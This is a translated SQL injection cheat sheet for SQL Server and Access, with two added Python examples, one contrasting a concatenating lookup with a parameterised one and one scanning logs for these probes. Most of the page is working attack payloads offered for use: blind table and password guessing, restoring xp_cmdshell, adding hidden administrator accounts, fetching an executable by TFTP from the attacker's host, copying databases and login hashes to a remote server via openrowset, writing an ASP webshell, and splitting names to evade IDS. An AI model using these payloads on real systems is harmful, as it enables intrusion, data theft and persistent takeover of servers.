When SQL injection comes up, you may think of tools such as Ah D and Mingxiaozi. These tools make it easy to scan for injection points and guess account passwords, but relying on them does not mean you have mastered the underlying principles.
Nowadays more and more people lean on tools and neglect the essentials. This page is about those basics.
First, determine whether there is an injection point:
'
and 1=1
and 1=2
Second, guess the table name. Common names include admin, adminuser, user, pass, password and so on.
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin)--  (determines whether the admin table exists)
Third, determine the number of accounts. If 0< returns the normal page and 1< returns the error page, the table holds exactly one account.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
Fourth, put the field names you can think of inside the len() brackets:
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(user field name)>0)
and 1=(select count(*) from admin where len(password field name)>0)
Fifth, find the length of each field by changing the number after > until the correct page is returned:
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6)  (error)
and 1=(select count(*) from admin where len(name)>5)  (correct, so the length is 6)
and 1=(select count(*) from admin where len(name)=6)  (correct)
and 1=(select count(*) from admin where len(password)>11)  (correct)
and 1=(select count(*) from admin where len(password)>12)  (error, so the length is 12)
and 1=(select count(*) from admin where len(password)=12)  (correct)
Sixth, guess the characters:
and 1=(select count(*) from admin where left(name,1)='a')--  (guesses the first character of the user name)
and 1=(select count(*) from admin where left(name,2)='ab')--  (the second character)
Add one more character each time until you reach the length found in the previous step; at that point the account name has been recovered.
and 1=(select top 1 count(*) from admin where asc(mid(pass,5,1))=51)--
This statement can be used to guess Chinese user names and passwords: replace the number at the end with the character code of a Chinese character, then convert the result back into a character.
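Every one of the six steps above depends on a single application defect: the request value is pasted into the SQL text, so the server evaluates the appended condition and the page either renders normally, renders empty, or errors. The following is an added example, not code from the original page: it builds the same three-way oracle in Python over an in-memory SQLite database, runs the page's first probes against a lookup that concatenates the id and against the same lookup with the value type-checked and bound as a parameter, and returns what each version would show. The table names admin and news, their rows, and the function names are constructed for the example; SQLite's length() stands in for SQL Server's len().

```python
import sqlite3
from typing import Callable, Optional

# Constructed sample schema: an 'admin' table like the one the page guesses at,
# and a 'news' table sitting behind a "?id=" style lookup.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'chris1', 'p4ssw0rd1234')")
    conn.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, news_id: str) -> Optional[str]:
    """The defect the page exploits: the request value is pasted into the SQL text."""
    sql = "SELECT title FROM news WHERE id = " + news_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, news_id: str) -> Optional[str]:
    """Hardened form: validate the type, then bind the value as a parameter."""
    try:
        ident = int(news_id)          # anything that is not a bare integer is rejected
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM news WHERE id = ?", (ident,)).fetchone()
    return row[0] if row else None


def page_for(lookup: Callable[[sqlite3.Connection, str], Optional[str]],
             conn: sqlite3.Connection, news_id: str) -> str:
    """Classify what a visitor would see: the article, an empty page, or an error page.
    This is the oracle that the page's 'correct page / error page' steps rely on."""
    try:
        return "normal" if lookup(conn, news_id) else "empty"
    except sqlite3.OperationalError:
        return "error"


# The page's first probes, appended to a legitimate id (SQLite spelling of the same tests).
PROBES = {
    "tautology":     "1 and 1=1",
    "contradiction": "1 and 1=2",
    "table exists":  "1 and 0<>(select count(*) from admin)",
    "table missing": "1 and 0<>(select count(*) from adminuser)",
    "name length":   "1 and 1=(select count(*) from admin where length(name)>5)",
}


def compare(conn: sqlite3.Connection) -> dict:
    """Run every probe through both implementations; returns {label: (vulnerable, safe)}."""
    return {label: (page_for(lookup_vulnerable, conn, p), page_for(lookup_safe, conn, p))
            for label, p in PROBES.items()}


if __name__ == "__main__":
    for label, (vuln, safe) in compare(build_db()).items():
        print(f"{label:14s} vulnerable={vuln:7s} safe={safe}")
```

The concatenating version answers every probe differently (normal, empty, normal, error, normal), which is exactly the signal the guessing steps need; the bound version returns an empty page for all of them because the value never reaches the SQL parser. Type-checking before binding is what makes the numeric id case airtight; for string parameters the bind alone carries the protection.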
group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values(666, 'attacker', 'foobar', 0xffff)--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME not in ('login_id')--
union select top 1 COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' and COLUMN_NAME not in ('login_id', 'login_name')--
union select top 1 login_name from logintable--
union select top 1 password from logintable where login_name='Rahul'--
Check the server patch level (if SP4 is installed, an error is returned):
and 1=(select @@VERSION)--
Check the permissions of the database connection account. If the page returns normally, the login is a member of the sysadmin server role.
and 1=(select IS_SRVROLEMEMBER('sysadmin'))--
Determine the database connection account (a normal return means the connection uses the sa login):
and 'sa'=(select system_user)--
and user_name()='dbo'--
and 0<>(select user_name())--
Check whether xp_cmdshell has been deleted:
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--
If xp_cmdshell has been deleted, restore it (an absolute path to the DLL is also accepted):
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'--
; exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\inetpub\wwwroot\xplog70.dll'--
Ping your own machine from the server:
; use master; declare @s int; exec sp_oacreate 'wscript.shell', @s out; exec sp_oamethod @s, 'run', null, 'cmd.exe /c ping 192.168.0.1';--
Add an account:
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory for the E: drive:
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "Default Web Site" -v "e","e:\"'--
Set its access permissions (and write a webshell into it):
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/root/e +browse'
Tip: %5c is the URL encoding of \ (when submitting, / and \ can be written in that encoded form).
and 0<>(select top 1 paths from newtable)--
Obtain database names (dbid 1 to 5 are system databases; user databases start from 6):
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9, ... in sequence to get the remaining database names.
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')  (gets the first user table)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin'))  (gets the other tables)
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))  (brute-forces the uid; suppose the id value found is 18779569)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569)  (gets one field of admin; suppose it is user_id)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id', ...))  (exposes the other fields)
and 0<(select user_id from bbs.dbo.admin where username>1)  (gets the user name)
In the same way you can get the password, assuming fields such as user_id, username and password exist.
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))  (determines the id value)
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794)  (all fields)
?id=-1 union select 1,2,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,4,5,6,7,8,*,9,10,11,12,13 from admin  (union also works against Access)
Obtain the web path:
; create table [dbo].[swap] ([swappass] [char](255));--
and (select top 1 swappass from swap)=1--
; create table newtable (id int identity(1,1), paths varchar(500)) declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test output insert into newtable(paths) values(@test)--
; use ku1;--
; create table cmd (str image);--  (creates a table cmd with an image-type column)
Test whether xp_cmdshell exists:
; exec master..xp_cmdshell 'dir'
; exec master.dbo.sp_addlogin jiaoniang$;--  (adds a SQL login)
; exec master.dbo.sp_password null, '1866574', 'jiaoniang$';--
; exec master.dbo.sp_addsrvrolemember jiaoniang$, sysadmin;--
; exec master.dbo.xp_cmdshell 'net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
; exec master.dbo.xp_cmdshell 'net localgroup administrators jiaoniang$ /add';--
exec master..xp_servicecontrol 'start', 'schedule'  (starts the Task Scheduler service)
exec master..xp_servicecontrol 'start', 'server'
; declare @shell int exec sp_oacreate 'wscript.shell', @shell output exec sp_oamethod @shell, 'run', null, 'c:\winnt\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add'
; exec master..xp_cmdshell 'tftp -i yourip get file.exe'  (uploads a file with TFTP)
; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
; declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
; declare @a sysname; set @a=db_name(); backup database @a to disk='\\your-ip\your-share\bak.dat'
If that is restricted, you can use:
select * from openrowset('sqloledb', 'server';'sa';'', 'select ''OK!''; exec master.dbo.sp_addlogin hax')
Query structure:
select * from news where id=... and topic=... and ...
admin' and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass<>''
select 123;--
; use master;--
'a' or name like 'fff%';--  (a user named ffff is shown)
and 1<>(select count(email) from [user]);--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--
; update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--
; update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
; update [users] set email=(select top 1 count(id) from password) where name='ffff';--
; update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--
; update [users] set email=(select top 1 name from password where id=2) where name='ffff';--
The statements above fetch the name of the first user table in the database and write it into the email field of the ffff user.
Viewing the ffff user's details then reveals the first table, ad.
Next the id of that table is looked up from the name ad, and with it the name of the second table, and so on.
insert into users values(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values(667, 123, 123, 0xffff)--
insert into users values(123, 'admin''--', 'password', 0xffff)--
; and user>0
; and (select count(*) from sysobjects)>0
; and (select count(*) from msysobjects)>0  (Access database)
Name of a data table:
; update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--
This writes the first table name into the aaa field.
Read it, then read the second table the same way by adding the condition and name<> followed by the name just obtained:
; update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--
Then: id=1552 and exists(select * from aaa where aaa>5)
Read the tables one by one until no more are returned.
The fields are read as follows:
; update aaa set aaa=(select top 1 col_name(object_id('table name'), 1));--
Then: id=152 and exists(select * from aaa where aaa>5)  (error)
; update aaa set aaa=(select top 1 col_name(object_id('table name'), 2));--
Then: id=152 and exists(select * from aaa where aaa>5)  (error)
[Retrieve a table name] [update the field value to the table name, then read that field to get the table name]
update table_name set field=(select top 1 name from sysobjects where xtype='u' and status>0 [and name<> each table name already obtained]) [where condition]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in ('table1', 'table2', ...)
Create a database administrator account and a system administrator account through a SQL Server injection vulnerability [the current account must be in the sysadmin group]
[Obtain a table's field names] [update the field value to the field name, then read that field to get the field name]
update table_name set field=(select top 1 col_name(object_id('table to query'), column number, e.g. 1)) [where condition]
Bypassing IDS detection [using variables]:
; declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
; declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
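Seen from the defender's side, the variable trick above, the char() concatenation used in the insert statements earlier, and the %5c encoding tip are all the same problem: a signature that matches only the literal text xp_cmdshell misses a request that arrives encoded or split into pieces. The following is an added example, not part of the original page: a small Python triage scanner that decodes each request target, folds char() chains and 'a'+'b' concatenation back into one literal, and only then matches a marker list built from the probes on this page. The log lines, the marker labels and the function names are constructed assumptions for the example.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed log lines (Common Log Format). Lines 1 to 3 carry probes taken from this
# page; lines 0 and 4 are ordinary traffic and must not be flagged.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2005:10:01:11 +0000] "GET /news.asp?id=7 HTTP/1.0" 200 5120',
    '10.0.0.9 - - [12/Mar/2005:10:01:15 +0000] "GET /news.asp?id=7%20and%201=(select%20IS_SRVROLEMEMBER(%27sysadmin%27))-- HTTP/1.0" 200 5120',
    '10.0.0.9 - - [12/Mar/2005:10:01:20 +0000] "GET /news.asp?id=7;declare%20@a%20sysname%20set%20@a=%27xp%27%2B%27_cm%27%2B%27dshell%27%20exec%20@a%20%27dir%20c:%5c%27-- HTTP/1.0" 500 311',
    '10.0.0.9 - - [12/Mar/2005:10:01:25 +0000] "GET /news.asp?id=7%20and%200%3C%3E(select%20top%201%20name%20from%20bbs.dbo.sysobjects%20where%20xtype=%27U%27) HTTP/1.0" 200 5120',
    '10.0.0.7 - - [12/Mar/2005:10:02:00 +0000] "GET /search.asp?q=cats+and+dogs HTTP/1.0" 200 2048',
]

REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_CALL = re.compile(r"char\s*\(\s*(0x[0-9a-f]+|\d+)\s*\)")
QUOTE_PLUS_QUOTE = re.compile(r"'\s*\+\s*'")

# (label, pattern) pairs built from the probes on this page; matched on normalised text.
MARKERS: List[Tuple[str, "re.Pattern"]] = [
    ("xp_ extended procedure", re.compile(r"\bxp_(cmdshell|dirtree|subdirs|availablemedia|regread|servicecontrol)\b")),
    ("OLE automation", re.compile(r"\bsp_oa(create|method|getproperty|setproperty)\b")),
    ("extended proc registration", re.compile(r"\bsp_addextendedproc\b")),
    ("role probing", re.compile(r"\bis_(srvrolemember|member)\s*\(")),
    ("metadata enumeration", re.compile(r"\b(sysobjects|syscolumns|sysdatabases|sysxlogins|information_schema)\b")),
    ("remote data access", re.compile(r"\bopenrowset\s*\(")),
    ("boolean probe", re.compile(r"\band\s+\d+\s*(=|<>|<|>)\s*\d+\b")),
    ("exec of a variable", re.compile(r"\bexec\s+@\w+")),
]


def decode_url(raw: str, max_rounds: int = 3) -> str:
    """Form-decode once ('+' is a space), then percent-decode repeatedly (bounded) so that
    double encoding and %5c-style tricks unfold while a decoded '+' survives as '+'."""
    text = raw.replace("+", " ")
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def _char_to_literal(match: "re.Match") -> str:
    token = match.group(1)
    code = int(token, 16) if token.startswith("0x") else int(token)
    # Non-printable and quote characters become '?' so they cannot unbalance the literal.
    ch = chr(code) if 32 <= code < 127 and code != 0x27 else "?"
    return "'" + ch + "'"


def normalize(text: str) -> str:
    """Lower-case, turn char(0x63)+char(0x68) chains into quoted text, join 'a'+'b' into 'ab',
    and collapse whitespace, so a split-up name such as 'xp'+'_cm'+'dshell' reads as one token."""
    text = text.lower()
    text = CHAR_CALL.sub(_char_to_literal, text)
    text = QUOTE_PLUS_QUOTE.sub("", text)
    return re.sub(r"\s+", " ", text).strip()


def scan_request(raw_target: str) -> List[str]:
    """Return the labels of every marker found in one decoded, normalised request target."""
    text = normalize(decode_url(raw_target))
    return [label for label, pattern in MARKERS if pattern.search(text)]


def scan_log(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line index, labels) for each log line whose request target matches a marker."""
    flagged = []
    for idx, line in enumerate(lines):
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        labels = scan_request(m.group(1))
        if labels:
            flagged.append((idx, labels))
    return flagged


if __name__ == "__main__":
    for idx, labels in scan_log(LOG_LINES):
        print(f"line {idx}: {', '.join(labels)}")
```

The normalisation step is what turns the split-name line into a hit: after folding, the request reads set @a='xp_cmdshell' exec @a, so both the procedure name and the exec-of-a-variable pattern fire. A line flagged only as "exec of a variable" is still worth reading even when no procedure name survives the folding, since that construct has no place in an ordinary query-string parameter. Only GET targets are inspected here; POST bodies need the same treatment once the log records them.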
1. Open a remote database
Basic syntax:
select * from openrowset('sqloledb', 'server=servername;uid=sa;pwd=123', 'select * from table1')
Parameters: (1) the OLE DB provider name, (2) the connection string, (3) the query to run.
2. The connection string can specify any port to connect to, for example:
select * from openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table')
(Ad hoc connections of this kind only work when the server's 'Ad Hoc Distributed Queries' option is enabled; it is off by default from SQL Server 2005 onward.)
3. Copy the entire database, inserting every table on the target host into tables on the remote server.
Basic syntax:
insert into openrowset('sqloledb', 'server=servername;uid=sa;pwd=123', 'select * from table1') select * from table2
This statement copies all the data in table2 on the target host into table1 in the remote database. In practice, change the IP address and port in the connection string to point where you want, for example:
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table1') select * from table2
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysdatabases') select * from master.dbo.sysdatabases
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysobjects') select * from user_database.dbo.sysobjects
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _syscolumns') select * from user_database.dbo.syscolumns
Copy the database:
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table1') select * from database..table1
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from table2') select * from database..table2
Copy the login password hashes, which are stored in sysxlogins:
insert into openrowset('sqloledb', 'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins
Once the hashes are obtained they can be cracked by brute force.
To traverse directories, create a temporary table temp:
; create table temp (id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--
; insert temp exec master.dbo.xp_availablemedia;--  (gets all current drives)
; insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--  (gets the subdirectory list)
; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';--  (gets the directory tree of all subdirectories into the temp table)
; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--  (views the content of a file)
; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
; insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s';--
; insert into temp(id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc'
; insert into temp(id, num1) exec master.dbo.xp_dirtree 'c:\';--  (xp_dirtree is executable by PUBLIC)
Write table:
Statement 1: and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
Statement 2: and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
Statement 3: and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
Statement 4: and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Statement 5: and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
Statement 6: and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
Statement 7: and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
Statement 8: and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
Statement 9: and 1=(select IS_MEMBER('db_owner'));--
Write the paths into a table:
; create table dirs (paths varchar(100), id int)--
; insert dirs exec master.dbo.xp_dirtree 'c:\'--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in ('@Inetpub'))--
; create table dirs1 (paths varchar(100), id int)--
; insert dirs1 exec master.dbo.xp_dirtree 'e:\web'--
and 0<>(select top 1 paths from dirs1)--
Back up the database into the web directory so it can be downloaded:
; declare @a sysname; set @a=db_name(); backup database @a to disk='e:\web\down.bak';--
and 1=(select top 1 name from (select top 12 id, name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(select top 1 col_name(object_id('USER_LOGIN'), 1) from sysobjects)  (shows the related table's columns)
and 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
-=- wscript.shell example -=-
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe'--
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while (@ret = 0)
begin
    print @line
    exec @ret = sp_oamethod @f, 'readline', @line out
end
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, '<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd")) %>'
declare @o int, @ret int
exec sp_oacreate 'speech.voicetext', @o out
exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
exec sp_oasetproperty @o, 'speed', 150
exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to, us', 528
waitfor delay '00:00:05'
; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528 waitfor delay '00:00:05'--
xp_dirtree is executable by PUBLIC:
exec master.dbo.xp_dirtree 'c:\'
The result has two columns, subdirectory and depth. subdirectory is a character column and depth is an integer column.
create table dirs (paths varchar(100), id int)
Create a table whose columns line up with the output of xp_dirtree: the same number of columns, with matching types.
insert dirs exec master.dbo.xp_dirtree 'c:\'
As long as the table definition matches the columns the stored procedure returns, insert ... exec works. Writing results into a table step by step is how the information we want is retrieved.